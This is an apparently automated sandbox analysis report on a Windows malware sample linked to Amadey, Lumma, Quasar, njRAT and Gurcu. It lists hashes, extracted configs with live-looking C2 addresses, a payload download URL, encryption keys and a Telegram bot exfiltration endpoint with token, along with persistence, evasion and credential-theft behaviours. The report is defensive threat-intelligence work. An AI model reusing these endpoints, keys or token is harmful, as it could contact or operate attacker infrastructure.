amadey | f74c7f0f5dae37d963ea8da58577a22cf731ee372176eb9ca5e5934916cdd15f

Analysis

max time kernel
90s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250619-en
resource tags

arch:x64arch:x86image:win10v2004-20250619-enlocale:en-usos:windows10-2004-x64system
submitted
25/06/2025, 03:48

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

2025-06-25_32fee7da45dc93a2079f14b6772f64e6_amadey_black-basta_cova_cryptbot_elex_luca-stealer.exe
Size

3.2MB
MD5

32fee7da45dc93a2079f14b6772f64e6
SHA1

a8abaf13b1d32db4ac28b3c8e7d2812740e4fadc
SHA256

f74c7f0f5dae37d963ea8da58577a22cf731ee372176eb9ca5e5934916cdd15f
SHA512

1a223d30b215eff0e22f4a0b09f63d67a663e41c8998eb21b953a2a2eb82d30ce854525ec86a39bc0da001625b2096670030557adaf45cd62361a08c2b073dbb
SSDEEP

49152:7B60cRCBgsmETpcCMgiYwCVcMGetz25MaG2Prv0jHls0ptWQZmxJ5PBw3BMyHI59:FgAGlET3RVSbTr4m03lcPe3Brqvd

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.156.72.2/testmine/random.exe

Extracted

Family

amadey

Version

5.34

Botnet

8d33eb

http://185.156.72.96

Attributes

install_dir
d610cf342e
install_file
ramez.exe
strings_key
4a2b1d794e79a4532b6e2b679408d2bb
url_paths
/te4h2nus/index.php

rc4.plain

Extracted

Family

lumma

https://equidn.xyz/xapq/api

https://gewgb.xyz/axgh/api

https://skjgx.xyz/riuw/api

https://ropyi.xyz/zadf/api

https://spjeo.xyz/axka/api

https://baviip.xyz/twiw/api

https://shaeb.xyz/ikxz/api

https://firddy.xyz/yhbc/api

https://trqqe.xyz/xudu/api

Extracted

Family

quasar

Version

1.4.1

Botnet

Google Chrome

66.63.187.164:8596

Mutex

2c4580c8-66ed-44c1-9d8b-da599f0a454b

Attributes

encryption_key
A978BA54BE34046C0D3E3D447504B0C1FBA599C7
install_name
Client.exe
key_salt
bfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941
log_directory
Logs
reconnect_delay
5000
startup_key
Edge Browser
subdirectory
Chrome Google

Extracted

Family

njrat

Version

Njrat 0.7 Golden By Hassan Amiri

Botnet

HacKed

66.63.187.164:8595

Mutex

svchost

Attributes

reg_key
svchost
splitter
|Hassan|

Extracted

Family

gurcu

https://api.telegram.org/bot7841921350:AAFGkor-dSPkf-PgNgU6DqA2BBmIM8f_vRU/sendMessage?chat_id=6299414420

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detects DonutLoader 1 IoCs

loader

resource	yara_rule
behavioral1/memory/1368-1958-0x00000000045F0000-0x0000000004660000-memory.dmp	family_donutloader

DonutLoader
DonutLoader is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies.
loader donutloader
Donutloader family
donutloader
Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Njrat family
njrat
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000800000002414c-4956.dat	family_quasar
behavioral1/memory/7108-4965-0x0000000000840000-0x0000000000B64000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 4184 created 2596	4184	oSOnryg.exe	42
PID 4184 created 2916	4184	oSOnryg.exe	405

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

CryptOne packer 1 IoCs

Detects CryptOne packer defined in NCC blogpost.

cryptone packer

resource	yara_rule
behavioral1/files/0x00090000000240eb-4870.dat	cryptone

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	573ce1a5ed.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
121	4368	rundll32.exe
125	4368	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1336	powershell.exe

Downloads MZ/PE file 16 IoCs

flow	pid	Process
15	1464	ramez.exe
15	1464	ramez.exe
15	1464	ramez.exe
15	1464	ramez.exe
15	1464	ramez.exe
15	1464	ramez.exe
15	1464	ramez.exe
15	1464	ramez.exe
15	1464	ramez.exe
15	1464	ramez.exe
15	1464	ramez.exe
281	1256	MSBuild.exe
287	1256	MSBuild.exe
287	1256	MSBuild.exe
17	1336	powershell.exe
62	1464	ramez.exe

Sets service image path in registry 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\IObitUnlocker\ImagePath = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IObitUnlocker\\IObitUnlocker.sys"	Unlocker.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\IObitUnlocker\ImagePath = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IObitUnlocker\\IObitUnlocker.sys"	Unlocker.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\IObitUnlocker\ImagePath = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IObitUnlocker\\IObitUnlocker.sys"	Unlocker.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\IObitUnlocker\ImagePath = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IObitUnlocker\\IObitUnlocker.sys"	Unlocker.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\IObitUnlocker\ImagePath = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IObitUnlocker\\IObitUnlocker.sys"	Unlocker.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\IObitUnlocker\ImagePath = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IObitUnlocker\\IObitUnlocker.sys"	Unlocker.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 5 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
2388	msedge.exe
4468	msedge.exe
4508	msedge.exe
3656	msedge.exe
1340	msedge.exe

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	GoogleChrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	GoogleChrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	GoogleChrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	573ce1a5ed.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	573ce1a5ed.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e6f0f77b36.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e6f0f77b36.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	GoogleChrome.exe

Checks computer location settings 2 TTPs 18 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Control Panel\International\Geo\Nation	2025-06-25_32fee7da45dc93a2079f14b6772f64e6_amadey_black-basta_cova_cryptbot_elex_luca-stealer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Control Panel\International\Geo\Nation	2S1Sw2mW.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Control Panel\International\Geo\Nation	Unlocker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Control Panel\International\Geo\Nation	blOahSM.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Control Panel\International\Geo\Nation	Co92cUt4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Control Panel\International\Geo\Nation	Unlocker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Control Panel\International\Geo\Nation	Unlocker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Control Panel\International\Geo\Nation	Unlocker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Control Panel\International\Geo\Nation	ramez.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Control Panel\International\Geo\Nation	qGkirdNH.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Control Panel\International\Geo\Nation	Unlocker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Control Panel\International\Geo\Nation	Unlocker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Control Panel\International\Geo\Nation	EG11t89.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Control Panel\International\Geo\Nation	blOahSM.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Control Panel\International\Geo\Nation	index.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Control Panel\International\Geo\Nation	Unlocker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Control Panel\International\Geo\Nation	Unlocker.exe

Drops startup file 13 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SVZOYU.exe.lnk	SVZOYU.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JDPJZW.exe.lnk	JDPJZW.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OMOEUF.exe.lnk	OMOEUF.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ODUDDN.exe.lnk	ODUDDN.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JDPJZW.exe.lnk	JDPJZW.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSvc.lnk	nudwee.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SVZOYU.exe.lnk	SVZOYU.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OMOEUF.exe.lnk	OMOEUF.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\POMRHO.exe.lnk	POMRHO.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OGKFZZ.exe.lnk	OGKFZZ.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSvc.lnk	EG11t89.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSvc.lnk	nudwee.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\POMRHO.exe.lnk	POMRHO.exe

Executes dropped EXE 64 IoCs

pid	Process
4136	KrggRyL3.exe
3756	HanIpMq9.exe
2088	Co92cUt4.exe
668	2S1Sw2mW.exe
1464	ramez.exe
2320	nircmd.exe
2344	NSudoLG.exe
2260	ramez.exe
4512	index.exe
3688	oxQ1wSE6.exe
4596	yPZgOUib.exe
4384	ggWoUHI3.exe
4844	qGkirdNH.exe
3280	nircmd.exe
4860	NSudoLG.exe
1332	7z.exe
1300	Unlocker.exe
4628	Unlocker.exe
3820	cbe5839bbf.exe
1328	Unlocker.exe
2688	IObitUnlocker.exe
4892	IObitUnlocker.exe
1560	IObitUnlocker.exe
1660	RoamingU81CE1A9KTGDPTFLKNQCWXXIEL52REBS.EXE
1148	7z.exe
2316	Unlocker.exe
2080	573ce1a5ed.exe
1632	IObitUnlocker.exe
4720	IObitUnlocker.exe
3836	IObitUnlocker.exe
3168	IObitUnlocker.exe
4124	IObitUnlocker.exe
2608	IObitUnlocker.exe
3472	IObitUnlocker.exe
2168	IObitUnlocker.exe
4584	IObitUnlocker.exe
1352	IObitUnlocker.exe
3384	IObitUnlocker.exe
4476	IObitUnlocker.exe
3912	Unlocker.exe
2052	IObitUnlocker.exe
1448	rZBRvVk.exe
4508	IObitUnlocker.exe
1364	IObitUnlocker.exe
4904	IObitUnlocker.exe
3580	IObitUnlocker.exe
1700	IObitUnlocker.exe
1888	IObitUnlocker.exe
4648	IObitUnlocker.exe
3916	IObitUnlocker.exe
1804	IObitUnlocker.exe
1284	IObitUnlocker.exe
2788	IObitUnlocker.exe
3160	IObitUnlocker.exe
1188	IObitUnlocker.exe
2716	IObitUnlocker.exe
2568	IObitUnlocker.exe
1368	EG11t89.exe
112	Unlocker.exe
212	Unlocker.exe
4304	IObitUnlocker.exe
4924	IObitUnlocker.exe
544	nudwee.exe
1660	IObitUnlocker.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Wine	573ce1a5ed.exe

Loads dropped DLL 64 IoCs

pid	Process
2688	IObitUnlocker.exe
4892	IObitUnlocker.exe
1560	IObitUnlocker.exe
1632	IObitUnlocker.exe
4720	IObitUnlocker.exe
3836	IObitUnlocker.exe
3168	IObitUnlocker.exe
4124	IObitUnlocker.exe
2608	IObitUnlocker.exe
3472	IObitUnlocker.exe
2168	IObitUnlocker.exe
4584	IObitUnlocker.exe
1352	IObitUnlocker.exe
3384	IObitUnlocker.exe
4476	IObitUnlocker.exe
2052	IObitUnlocker.exe
4508	IObitUnlocker.exe
1364	IObitUnlocker.exe
4904	IObitUnlocker.exe
3580	IObitUnlocker.exe
1700	IObitUnlocker.exe
1888	IObitUnlocker.exe
4648	IObitUnlocker.exe
3916	IObitUnlocker.exe
1804	IObitUnlocker.exe
1284	IObitUnlocker.exe
2788	IObitUnlocker.exe
3160	IObitUnlocker.exe
1188	IObitUnlocker.exe
2716	IObitUnlocker.exe
2568	IObitUnlocker.exe
4304	IObitUnlocker.exe
4924	IObitUnlocker.exe
1660	IObitUnlocker.exe
1432	IObitUnlocker.exe
3280	IObitUnlocker.exe
4940	IObitUnlocker.exe
2560	IObitUnlocker.exe
2892	IObitUnlocker.exe
2664	IObitUnlocker.exe
3160	IObitUnlocker.exe
3512	IObitUnlocker.exe
112	IObitUnlocker.exe
1492	IObitUnlocker.exe
2700	IObitUnlocker.exe
2940	IObitUnlocker.exe
4136	IObitUnlocker.exe
4536	IObitUnlocker.exe
4788	IObitUnlocker.exe
4296	IObitUnlocker.exe
2856	IObitUnlocker.exe
1108	IObitUnlocker.exe
2404	IObitUnlocker.exe
3424	IObitUnlocker.exe
4812	IObitUnlocker.exe
3416	IObitUnlocker.exe
4704	IObitUnlocker.exe
2332	IObitUnlocker.exe
1556	IObitUnlocker.exe
2620	IObitUnlocker.exe
4796	IObitUnlocker.exe
3164	IObitUnlocker.exe
3560	IObitUnlocker.exe
1740	IObitUnlocker.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook	MSBuild.exe
Key queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook	MSBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	MSBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook	MSBuild.exe
Key queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook	MSBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	MSBuild.exe
Key queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook	MSBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook	MSBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook	MSBuild.exe
Key queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook	MSBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook	MSBuild.exe
Key queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook	MSBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key queried	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook	MSBuild.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cbe5839bbf.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10486700101\\cbe5839bbf.exe"	ramez.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chromium = "C:\\Users\\Admin\\AppData\\Local\\GoogleChrome.exe"	e6f0f77b36.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OMOEUF.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\YPEDQLEKNKH\\OMOEUF.exe"	OMOEUF.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\JDPJZW.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\GUOYHSOSYLM\\JDPJZW.exe"	JDPJZW.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DMNUZU.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\UUMGKWFSSZY\\DMNUZU.exe"	DMNUZU.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\573ce1a5ed.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10486710101\\573ce1a5ed.exe"	ramez.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	rZBRvVk.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SVZOYU.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NUKKJONINQE\\SVZOYU.exe"	SVZOYU.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\POMRHO.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IHDYSHSTEVV\\POMRHO.exe"	POMRHO.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OGKFZZ.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\QFZDYNRZIVF\\OGKFZZ.exe"	OGKFZZ.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ODUDDN.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\OFYGUKVQIFY\\ODUDDN.exe"	ODUDDN.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\index.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10486690101\\index.exe"	ramez.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
52	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0009000000024025-9.dat	autoit_exe
behavioral1/files/0x0008000000021c9b-82.dat	autoit_exe
behavioral1/files/0x000b000000023eb0-138.dat	autoit_exe

